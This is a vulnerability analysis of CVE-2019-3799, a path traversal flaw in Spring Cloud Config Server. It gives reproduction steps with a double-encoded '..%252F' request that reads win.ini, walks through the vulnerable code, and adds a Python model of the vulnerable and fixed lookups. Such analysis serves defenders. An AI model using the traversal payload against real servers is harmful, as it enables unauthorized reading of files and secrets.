CVE-2019-3799 Spring-Cloud-Config-Server Path Traversal / Arbitrary File Read

Reproduction

Add the vulnerable dependency to pom.xml (in IDEA):

<dependency>
    <groupId>org.springframework.cloud</groupId>
    <artifactId>spring-cloud-config-server</artifactId>
    <version>2.0.2.RELEASE</version>
</dependency>

Configure application.properties:

server.port=8888
spring.cloud.config.server.git.uri=https://github.com/SukaraLin/awesome-cve-poc.git

Then request http://127.0.0.1:8888/aaa/bbb/master/..%252F..%252F..%252F..%252F..%252F..%252Fwindows/win.ini and the server returns the contents of win.ini.

Analysis

Spring Cloud Config Server is Spring's server for distributed configuration management; clients fetch configuration values from it over HTTP. The route that the payload hits is `org.springframework.cloud.config.server.resource.ResourceController#retrieve()`:

    @RequestMapping({"/{name}/{profile}/{label}/**"})
    public String retrieve(@PathVariable String name, @PathVariable String profile, @PathVariable String label, HttpServletRequest request, @RequestParam(defaultValue = "true") boolean resolvePlaceholders) throws IOException {
        String path = this.getFilePath(request, name, profile, label);
        return this.retrieve(name, profile, label, path, resolvePlaceholders);
    }

{name}/{profile}/{label}: name is the application name, profile is the environment, and label is the branch/label of the configuration repository. In testing all three must be present, but any values work (the request above uses aaa/bbb/master). Debugging getFilePath shows that it extracts the remainder of the URL after the label, still containing the `..%2F` sequences; follow into retrieve(), and that remainder is the `path` value:


The lookup then happens in `org.springframework.cloud.config.server.resource.GenericResourceRepository#findOne`:

The `locations` list contains `file:/C:/Users/icu/AppData/Local/Temp/config-repo-6608031716294156148/`, the local clone of the configured Git repository. The requested path is appended to this location and loaded from there; because `..%2F` is still encoded when the path is matched, no traversal is detected, and the `..` segments take effect once the resource is resolved to a file, so a file outside the repository is returned.

Fix

https://github.com/spring-cloud/spring-cloud-config/commit/3632fc6f64e567286c42c5a2f1b8142bfde505c2


The fix first URL-decodes the path (so escapes such as `%2F` and `%252F` are normalized) and then rejects it if it contains traversal sequences such as `../` or `..\`.
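The following is an added example, not code from the page or from the Spring Cloud Config project. It models the two lookups discussed above in Python: the pre-fix resolution, in which the path still carries `%2F` after the servlet container's single decode and only becomes `../` when the `file:` location is turned into a filesystem path, and a hardened lookup in the spirit of the fix, which decodes fully, rejects `..`, and additionally confirms the resolved file stays under the repository location (that last check is an extra safeguard assumed here, not something the page attributes to the fix). The repository location is a constructed POSIX stand-in for the Windows temp clone shown on the page; `container_decode`, `vulnerable_find_one`, `hardened_find_one` and `NoSuchResourceException` are names chosen for this example.

```python
import posixpath
from urllib.parse import unquote

# Constructed stand-in for the local Git clone that the server keeps in its
# temp directory (the page shows a Windows path; POSIX is used so this runs
# anywhere). It plays the role of one entry in the `locations` list.
REPO_LOCATION = "/tmp/config-repo-6608031716294156148/"

# The part of the page's request URL that follows /aaa/bbb/master/
PAYLOAD = "..%252F" * 6 + "windows/win.ini"


class NoSuchResourceException(Exception):
    """Stand-in for the exception the server raises when a resource is missing."""


def container_decode(raw_url_path: str) -> str:
    """First and only decode performed before routing, as a servlet container does.

    '..%252F' becomes '..%2F'. That is not yet a path separator, so neither the
    container's own '../' normalisation nor the route pattern sees a traversal.
    """
    return unquote(raw_url_path)


def vulnerable_find_one(location: str, path_after_label: str) -> str:
    """Models the pre-fix lookup (assumption: behaviour summarised from the page).

    location + path is handed to the resource loader as a file: URL; turning that
    URL into a filesystem path decodes percent-escapes once more, so '%2F'
    becomes '/' and the '..' segments walk out of the repository.
    """
    decoded_again = unquote(path_after_label)
    return posixpath.normpath(posixpath.join(location, decoded_again))


def hardened_find_one(location: str, path_after_label: str) -> str:
    """Models the fix direction described on the page, plus a containment check.

    1. Decode until the string is stable, so no number of encoding layers can
       hide a '..' (this covers %2E%2E and %252E%252E as well as %2F).
    2. Reject any path that contains '..' after normalising '\\' to '/'.
    3. (Extra safeguard, an assumption of this example) resolve the path and
       refuse anything that does not stay under the repository location.
    """
    decoded = path_after_label
    while True:
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt

    normalised = decoded.replace("\\", "/")
    if ".." in normalised:
        raise NoSuchResourceException("traversal sequence in path: %r" % path_after_label)

    base = posixpath.normpath(location)
    resolved = posixpath.normpath(posixpath.join(base, normalised))
    if not resolved.startswith(base + "/"):
        raise NoSuchResourceException("path escapes repository: %r" % path_after_label)
    return resolved


if __name__ == "__main__":
    once = container_decode(PAYLOAD)
    print("after container decode :", once)
    print("pre-fix lookup resolves:", vulnerable_find_one(REPO_LOCATION, once))
    try:
        hardened_find_one(REPO_LOCATION, once)
    except NoSuchResourceException as exc:
        print("hardened lookup        :", exc)
    print("benign lookup          :", hardened_find_one(REPO_LOCATION, "application.properties"))
```

Running it shows why the page's payload is double encoded: after the container's single decode the path contains no literal `../`, so a check applied before decoding would pass it, yet the pre-fix resolution ends at `/windows/win.ini`, six levels above the repository clone. The hardened lookup rejects the same input and still serves an ordinary file such as `application.properties`.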

References

  1. [Spring-Cloud-Config-Server arbitrary file read analysis](http://www.lmxspace.com/2019/04/26/Spring-Cloud-Config-Server-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E5%88%86%E6%9E%90/)
